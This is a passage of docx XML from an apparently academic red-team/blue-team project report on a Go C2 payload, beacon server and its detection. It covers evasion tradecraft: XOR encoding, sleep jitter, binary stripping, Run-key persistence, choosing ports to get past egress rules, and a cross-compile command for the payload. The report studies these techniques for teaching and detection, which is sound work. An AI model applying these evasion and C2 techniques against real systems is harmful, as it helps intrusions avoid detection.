        <w:t>The following items were identified during the project but were not implemented within the current scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12139567" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>HTTPS support for the C2 server was identified as a desirable extension but was not implemented. Adding TLS would require a self-signed certificate, Nginx proxy configuration changes, and would make the network detection analysis richer by demonstrating why TLS inspection is necessary on the defensive side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1457549B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A live beacon log on the documentation website — showing incoming beacons in real time — was planned but not implemented within the project timeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75557D05" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>A full Zeek analysis of captured beacon traffic to generate a formal detection signature was not completed. Zeek was used for conceptual analysis but a scripted detection rule was not produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA2A4A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">garble — a Go build-time obfuscator that defeats </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by randomising .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function names — was identified as a natural extension beyond binary stripping but was not implemented as it falls outside the scope of the three defined obfuscation layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A255449" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell CIM alternatives to wmic were documented as a note but not fully tested across all lab configurations where wmic.exe is deprecated in newer Windows builds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F7B05" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="23BF2418" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="76D865D0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc226583774"/>
      <w:r>
        <w:t>9.4  Lessons Learned</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="66C6C622" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Static binary advantage: The single-file, dependency-free Go binary is the clearest practical demonstration of why Go is used for offensive tooling. No runtime on the target means no setup friction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC0401" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Detection is visible from the start: Even the simplest v1 payload produces multiple Sysmon events. Understanding this from the first lesson makes the obfuscation phase's purpose concrete rather than abstract.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C228BA8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Wireshark as a teaching tool: Capturing the HTTP POST beacon in Wireshark and following the TCP stream gives an immediate visual demonstration of why plaintext exfiltration is a detection risk — more effective than any written explanation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64547815" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence is a high-signal indicator: The Registry Run key is one of the highest-signal detection rules in enterprise SIEM environments. Autoruns.exe surfaces it immediately. This teaches why persistence requires careful OPSEC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FA57B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Binary stripping raises cost but does not prevent analysis: The before/after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comparison makes the limitation of -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> immediately visible. The .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> section persisting and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> recovering all function names in under a minute is a more effective lesson than any written explanation — it demonstrates that stripping is a speed bump, not a wall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D6BA6" w14:textId="15E7D0FE" w:rsidR="002C0DF0" w:rsidRDefault="00636351" w:rsidP="00636351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Separating C2 from hosting: Running the C2 server (port 5000) and the documentation website (port 8000 locally, exposed on port 30081 via Kubernetes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NodePort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on AWS) as separate Flask processes mirrors real-world infrastructure separation and avoids confusing the two roles in the academic analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF786DC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="64FD91AB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc226583775"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.5  What Would You Do Differently</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6ECA2E9A" w14:textId="10BCD03F" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reflecting on the </w:t>
      </w:r>
      <w:r w:rsidR="005B227B">
        <w:t>project, several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> decisions would be made differently if starting again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AAFD9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Start with HTTPS on the C2 server from Phase 03 rather than treating it as a future extension — this would have made the network detection analysis richer from the outset, showing how TLS changes the Wireshark and Zeek signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8F2DE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Use a configuration file or environment variable for the C2 IP address rather than hardcoding it in the Go source — this is a more realistic approach that also makes the project easier to demonstrate across different lab network configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA2316" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement a second persistence mechanism (e.g., scheduled task) alongside the Registry Run key from Phase 02, giving more material for the blue team analysis and making the Pyramid of Pain comparison more nuanced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0E72B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Write automated test cases for each payload version using a mock C2 server from the beginning — this would have made regression testing between versions faster and more reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D115735" w14:textId="0BA0177C" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plan the documentation website structure before writing the first lesson — the current site grew </w:t>
      </w:r>
      <w:r w:rsidR="005B227B">
        <w:t>organically,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and some structural inconsistencies required refactoring mid-project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B4607" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1BCA2FBF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="36966484" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="429AE349" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc226583776"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10. Technical Issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="4B0E3E5C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7B3D43" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1EEA3E7C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This section addresses the technical specifics of the project: deviations from the initial design, implementation difficulties, tool and software issues encountered, and the testing approach used to verify reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BDA5D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="13A4E7EC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3861FCCF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc226583777"/>
      <w:r>
        <w:t>10.1  Differences from Initial Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="222C7442" w14:textId="18426C8F" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The initial project specification envisioned a single monolithic Python script acting as both the C2 listener and the documentation site. During Phase 03 it became clear that mixing the two roles on the same port was architecturally problematic and would make the academic analysis harder to follow. The final design separates them into two distinct Flask processes on ports 5000 and </w:t>
      </w:r>
      <w:r w:rsidR="005B227B" w:rsidRPr="005B227B">
        <w:t>30081</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> respectively — a change that better mirrors real-world C2 infrastructure where operator tooling and listener services are kept separate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74C066" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0005DA48" w14:textId="5AC5176D" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original payload was also planned as a single-version Python script. Switching to Go allowed cross-compilation to a static Windows .exe with no external dependencies on the target, which proved to be the most instructive architectural decision of the project. The three-version progression (v1 </w:t>
      </w:r>
      <w:r w:rsidR="00A742A8">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v2 </w:t>
      </w:r>
      <w:r w:rsidR="00A742A8">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v3</w:t>
      </w:r>
      <w:r w:rsidR="008B0CA9">
        <w:t xml:space="preserve"> to v4 to v5</w:t>
      </w:r>
      <w:r>
        <w:t>) was added once it became clear that incremental capability expansion made the MITRE technique mapping far clearer for an educational audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93ABBB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6B30323F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The obfuscation phase was originally planned as one technique (string encoding). It was expanded to three techniques (XOR encoding, sleep jitter, binary stripping) after the blue team analysis identified multiple independent detection vectors that each required a distinct countermeasure to address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330498B1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5262973D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Binary stripping required no source code change — only a build flag change from the standard go build command to go build -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="-s -w". This made it the simplest of the three obfuscation techniques to implement. The more significant learning was discovering the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limitation: this section of the binary is required by the Go runtime and cannot be stripped, meaning </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can recover all function names from a stripped binary in under one minute. This was documented explicitly in the blue team analysis rather than omitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50F04E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5B1F9E73" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="670E91DE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc226583778"/>
      <w:r>
        <w:t>10.2  Implementation Difficulties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="34FEE7A9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go cross-compilation: The GOOS and GOARCH environment variables must be set explicitly at build time. Early builds produced Linux ELF binaries because the variables were not exported in the terminal session. The fix was to include them </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: GOOS=windows GOARCH=amd64 go build -o payload.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>net_scan.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48CC21E8" w14:textId="42B74253" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>init_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() equivalent issue: The beacon save logic initially failed silently when the uploads/ directory did not exist. Added an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.MkdirAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call at server startup to ensure the directory is always created before the first beacon arrives.</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> This was mainly in earlier builds when I was writing recon outputs locally to temp files so we could see results. It is now uploaded to a file called uploads in working directory but should still create a upload file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DA948" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wmic deprecation on Windows 11: The wmic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logicaldisk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command returned empty output on the Windows 11 lab VM. The documentation was updated to include the PowerShell CIM equivalent: Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Win32_LogicalDisk | Select-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FreeSpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A940D7F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6CD6688C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7875B186" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc226583779"/>
      <w:r>
        <w:t>10.3  Tool and Software Issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="56286CD2" w14:textId="0F3809F0" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Firewall blocking C2 beacons: The VM could not reach port 5000 on the operator machine until an explicit inbound rule was added (TCP 5000, scope limited to the lab subnet). This is documented as a detection opportunity in the blue team analysis — enterprise firewalls block egress on non-standard ports by default.</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> So </w:t>
      </w:r>
      <w:r w:rsidR="00E22C70">
        <w:t>maybe</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> changing ports would be a good opportunity depending on egre</w:t>
      </w:r>
      <w:r w:rsidR="00E22C70">
        <w:t>ss</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> and ingress rules present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E399F7" w14:textId="7406E191" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sysmon configuration: The default Sysmon configuration did not log all required event IDs.</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E22C70">
        <w:t>EID 1 and EID 13 were confirmed present during testing. EID 1 is included as a screenshot in Section 5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2196853B" w14:textId="0225B082" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Wireshark permissions: Running Wireshark on Windows required administrator privileges for the network capture interface to be accessible. This is a standard requirement but added a setup step to the lab documentation.</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> Wireshark was captured via local loopback interface for the sake of testing c2 traffic in a lab environment but can </w:t>
      </w:r>
      <w:r w:rsidR="00E22C70">
        <w:t>easily</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> be done over network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681DC83" w14:textId="1E4ED512" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> startup time: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ghidra's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> JVM initialisation took several minutes on the lab hardware. This was noted in the lesson </w:t>
      </w:r>
      <w:r w:rsidR="00E22C70">
        <w:t>materials,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so students are not surprised during the binary analysis exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF54A48" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="032F8AF2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="51F210C6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc226583780"/>
      <w:r>
        <w:t>10.4  Testing Methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="4E7A51E0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Testing was conducted at three layers to verify that the project met its educational and functional objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3D5F7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="39544B88" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc226583781"/>
      <w:r>
        <w:t>Functional Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="71E28256" w14:textId="4721B6E3" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Each payload version was executed in the isolated VM and verified to produce the expected output file at C:\temp\recon_combined.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E2229C">
        <w:t xml:space="preserve"> (older builds for sake of testing)</w:t>
      </w:r>
      <w:r>
        <w:t>. The C2 server was checked to confirm that a corresponding timestamped file appeared in the uploads/ directory within the 60-second beacon window. All CRUD paths on the documentation website were verified manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF0698" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6A9CB7AE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc226583782"/>
      <w:r>
        <w:t>Detection Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="193F6C79" w14:textId="73720DAF" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sysmon event logs were reviewed after each payload execution to confirm that the expected EIDs (1, 3, 11, 13) were generated. Autoruns.exe was used to verify that the HKCU Run key </w:t>
